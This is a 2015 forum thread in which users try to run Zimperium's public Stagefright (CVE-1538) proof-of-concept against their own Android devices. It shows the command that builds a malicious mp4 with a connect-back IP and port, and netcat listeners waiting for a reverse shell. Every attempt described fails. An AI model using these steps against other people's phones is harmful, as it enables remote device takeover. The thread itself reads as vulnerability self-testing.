0v3rl04d Posted October 11, 2015

Hi guys, after the discovery of the Stagefright bug, the researchers at Zimperium have posted a Python script for the specific module CVE 1538. I've downloaded it and I've tried to execute it on my Android phone with Lollipop 5.0. Before this, I downloaded the Zimperium APK to test if my phone is vulnerable. The app shows me, in green, the module CVE-1538 and others... After this, on my Linux PC with Python 2.7.x, I renamed the script to mp4.py to resolve an import error. Then I tried to generate the file.mp4 with this command:

    $python2 mp4.py -c [LAN IP] -p 4444

The script correctly generates a file.mp4 without an error. Afterwards I launched a listener with:

    $netcat -l -p 4444

I sent the file.mp4 to my smartphone and tried to run it. The terminal with netcat doesn't show anything, no result, nisba, nada... I've tried with the Metasploit listener with multi/handler, but with the same result. Any solution? Thanks everyone, and sorry for my English ;-P

cooper Posted October 12, 2015

> The app shows me, in green, the module CVE-1538 and others...

According to the screenshots provided for the Stagefright Detector app they released, green means your phone is NOT susceptible. Given that, what is it you're trying to do?

0v3rl04d Author Posted October 12, 2015

Sorry, I don't mean the final red bar, but the module results in the new version of the app are colored in green and red. This is an example on my phone: http://imgur.com/Lyex9y5

digip Posted October 15, 2015

I would assume the same thing Cooper said, that if you are in green for "CVE-1538" specifically, you are only vulnerable to the attacks that fall under the other CVEs that are listed in red.

Another thing to consider: if you are vulnerable, maybe the listener doesn't see anything because it can't reach your machine from the phone, which may need port forwarding and such in place to see the reply from the phone. Test that everything is working for the listener first: connect locally from another machine to your listener. If it works locally, then try from the internet, such as setting up a fake web page and then connecting over your browser. Ex:

    cat sometextfile.txt | nc -l -p 4444

(Or if on Windows)

    type sometextfile.txt | nc -l -p 4444

And then in your browser, connect to your local IP using http://your.local.ip/ and your internet-based IP (type "ip" by itself into Google to get your external IP). You should see the output of your text file in your web browser. If that works locally and remotely, then you should see whatever the phone is supposed to send back to you. Get the listener working first, then you can test if the code works against your phone. If it doesn't send back a shell or whatever prompt it's supposed to show from the phone, then you probably aren't vulnerable.

0v3rl04d Author Posted October 16, 2015

Thank you, it's a very simple and good test for netcat. I didn't know it! I've tested locally and remotely and both work well! So probably my phone isn't vulnerable... I'll try with another phone...

ZaraByte Posted October 29, 2015

> Thank you, it's a very simple and good test for netcat. I didn't know it! I've tested locally and remotely and both work well! So probably my phone isn't vulnerable... I'll try with another phone...

People wanted me to do a video on this. The public exploit released doesn't work for my Nexus 7 2013 tablet, even though the detector claims my tablet is vulnerable. Renamed the Python script to mp4.py, that part works. When making the mp4, set my chost and set my cback port, made the mp4 called test.mp4, placed it on my Kali Apache server, started a nc -l -p 4444, went to my Kali webserver to run the mp4. Nothing happens :B no connect back on netcat, so :B